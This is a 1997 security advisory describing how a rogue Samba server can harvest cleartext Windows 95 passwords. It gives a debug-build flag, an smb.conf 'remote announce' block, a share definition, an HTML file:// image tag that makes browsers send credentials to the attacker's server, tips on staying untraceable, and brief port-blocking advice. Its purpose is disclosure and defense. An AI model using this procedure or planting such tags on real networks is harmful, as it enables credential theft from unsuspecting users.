SMB Attacks on Windows 95 

VERSIONS AFFECTED

Windows 95, with and without Internet Explorer.

DESCRIPTION

Apparently a new problem has been discovered that allows a malicious Web
developer to snag a Windows 95 password in cleartext, given only the IP
address and Workgroup name. The action could be done in such a way that it
leaves no noticeable trace what-so-ever, which makes it incredibly
dangerous indeed.

A Master Browser can be indirectly used as a tool against the machines it
serves by introducing a hostile host in to the browse list. This exploit
requires the use of a SAMBA server, which is a Unix based rendition of an
SMB compatible server.

Samba servers are capable of announcing themselves to a remote network
(workgroup) on a different subnet, given the workgroup name. An intruder
may use this technique in two ways to gain access to a username and
password. They could introduce a share from the system they place in the
browse list, and wait for a user to make an attempt at accessing it - at
which point the username and password are transmitted. They could also
embed the file:// tag into a Web page and wait for a user to arrive at that
page - at which point the Web browser would initiate a connection to the
remote server named in the file:// tag, and promptly transmit the username
and password. Sample HTML tag:

<img src=file://\\testsystem/testshare/testfile.gif> 

TESTING

* Compile Samba using -DDEBUG_PASSWORD

* Employ the remote announce option in the smb.cfg file, specifying the
remote host or broadcast address, and workgroup name of the network you
wish to test. Sample:

 workgroup = TEST
 preferred master = yes
 domain master = yes
 security = user
 debug level = 100
 remote announce = 10.0.0.255/WORKGROUP_NAME

* Establish a share on the Samba server. Sample:

[testt]
   path = /tmp
   public = no
   browsable = yes
      

* If you wish, place one or more files in the directory, then start the
smbd daemon. At this point, any SMB related traffic (e.g. browsing the
local machine) will cause the Samba server to announce itself to the remote
network specified. If the remote network is succesfully contacted, the
Samba server may be added to that network's browse list.

Later, checking the Samba log will reveal any information it has collected
about usernames and passwords. Entries will look similar to this:

checking user=[username] pass=[password] 

DEFENSE

Even though you need to have the remote network's workgroup name previous
to this type of attack, keep in mind that this name could be easily
obtained using the Windows nbtstat command.

Also take note that it is VERY easy for a perpetrator to completely hide
themselves during this attack by making a few minor adjustments to their
hostname and /etc/hosts file. In otherwords, this could be done in an
untraceable fashion in certain instances.

To stop this type of attack from outside your network (Internet), block
access to inbound traffic destined for ports 137, 138, and 139 on your
network. This does not solve problems with this type of attack coming from
inside your network.

Microsoft was informed of this problem on March 17, 1997. Watch this page
for more information.

Credits

Discovered by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.
Thanks to hobbit for his paper on CIFS, 
Thanks also to BioH for helping to test this, and anyone else who helped or
provided ideas. 

Posted here at The NT Shop March 17, 1997 - 10:40pm